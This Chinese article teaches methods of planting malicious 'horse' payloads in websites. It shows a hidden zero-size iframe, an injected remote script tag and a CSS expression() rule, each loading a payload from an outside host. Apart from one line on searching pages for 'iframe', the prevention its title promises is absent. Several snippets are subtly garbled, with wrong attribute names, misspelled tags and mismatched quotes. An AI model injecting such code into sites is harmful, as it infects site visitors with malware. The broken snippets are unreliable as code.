了解常用集中网站挂马和防范方法

核心提示：1、挂马的N种方法(1) HTML挂马法，常规的HTML挂马方法一般是在网页中插入一条iframe语句，了解常用集中网站挂马和防范方法，像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>，查看站点是否

1、挂马的N种方法

(1) HTML挂马法。

常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>。查看站点是否被挂，一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。

像再原来的网页中写入<script str=http://www.arthack.org/horse.js></script> ，horse里的js写法一般为 document.write(’http://www.arthack.org/horse.html’>;，或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<inframe src=http://www.zw361.com/horse.htm/”></iframe>”;。不过第2种写法要注意：是原来的网页种要有body标签。

3) 在 css中挂马。

这个方法就是在css中写入

body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=http://www.xxx.com/horse.html/”></iframe>’);
}

然后在主页中调用这个CSS，代码类似http://www.arthack.org/css.css” rel=”stylesheet” type=”text/css”>这样的。在csdn 中对expression的解释是：IE5及其以后版本支持在CSS中使用expression，用来吧CSS属性和javascript表达式关联起来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式，CSS属性的值等于 javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法，也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句，所以我们可用于挂马。不过写的语句值可以远程调用，本地不可以。